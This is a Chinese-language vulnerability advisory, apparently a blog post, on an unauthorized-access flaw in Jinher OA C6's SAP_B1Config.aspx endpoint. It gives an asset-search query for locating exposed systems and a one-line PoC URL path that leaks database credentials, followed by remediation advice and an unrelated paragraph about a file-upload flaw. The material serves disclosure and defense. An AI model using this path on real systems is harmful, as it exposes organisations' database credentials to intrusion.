金和OA C6 SAP_B1Config.aspx 未授权漏洞

产品介绍

金和网络是专业信息化服务商,为城市监管部门提供了互联网+监管解决方案,为企事业单位提供组织协同OA系统开发平台,电子政务一体化平台,智慧电商平台等服务。

漏洞描述

金和OA C6 SAP_B1Config.aspx接口 未授权,攻击者可通过此漏洞获取数据库账户密码等敏感信息。

资产测绘

app=“Jinher-OA”
在这里插入图片描述

漏洞复现

POC:

/C6/JHsoft.CostEAI/SAP_B1Config.aspx/?manage=1

在这里插入图片描述

修复建议

1、升级至最新安全版本。
2、限制接口访问。

  • 8
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
OA JC6是一套企业办公协同软件,用于企业内部的办公流程管理与协同办公。而NTKO-Upload是OA JC6中的一个模块,用于用户在办公过程中上传文件进行共享和交流。 然而,OA JC6和NTKO-Upload存在一个任意文件上传漏洞。该漏洞可能会被恶意攻击者利用,上传恶意文件,从而对系统造成潜在的安全风险。 恶意上传的文件可能包含恶意代码、病毒或其他有害的文件,攻击者可通过这些文件获取系统权限、窃取敏感信息、篡改数据等。由于OA JC6广泛应用于企业内部,一旦该漏洞被利用,可能会对企业的信息安全带来严重威胁。 为了防止利用这个漏洞进行任意文件上传的攻击,建议用户采取以下措施: 1. 及时升级OA JC6和NTKO-Upload软件,确保软件的最新版本中修复了该漏洞。 2. 对OA JC6和NTKO-Upload进行适当的安全配置,禁用或限制用户上传的文件类型和大小,只允许上传安全可信的文件。 3. 定期进行系统漏洞扫描和安全评估,及时发现并修复可能存在的漏洞。 4. 配置防火墙和入侵检测系统,及时发现和阻止恶意上传行为。 5. 培训企业员工,提高其安全意识,警惕不明文件的上传和下载。 总之,任意文件上传漏洞OA JC6和NTKO-Upload的安全构成潜在威胁,为保护企业信息安全,必须采取相应的安全防护措施,并保持软件的更新和维护。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值